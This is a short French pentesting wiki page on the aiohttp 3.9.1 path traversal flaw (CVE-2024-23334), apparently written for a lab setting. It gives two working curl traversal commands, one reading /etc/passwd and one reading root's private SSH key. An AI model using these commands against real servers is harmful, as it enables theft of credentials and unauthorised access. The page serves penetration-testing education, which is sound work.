LFI (http Python3.9) - Pentesting Web

Vulnérabilité LFI http Python 3.9 [CVE-2024-23334]

Si l'on utilise curl pour afficher le contenu du port interne web 8080, on remarque qu'une version vulnérable de Python 3.9 est en cours d'exécution, précisément aiohttp/3.9.1.

GitHub - z3rObyte/CVE-2024-23334-PoC: A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1GitHub

Lister le contenu de /etc/passwd

Nous pouvons lister le contenu du fichier /etc/passwd en utilisant la commande suivante :

curl -s --path-as-is http://localhost:8080/assets/../../../../etc/passwd

Accéder à la clé SSH privée de root

Étant donné que l'on peut parcourir les fichiers du système, nous allons maintenant tenter de récupérer la clé SSH privée de l'utilisateur root :

curl -s --path-as-is http://localhost:8080/assets/../../../../root/.ssh/id_rsa

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?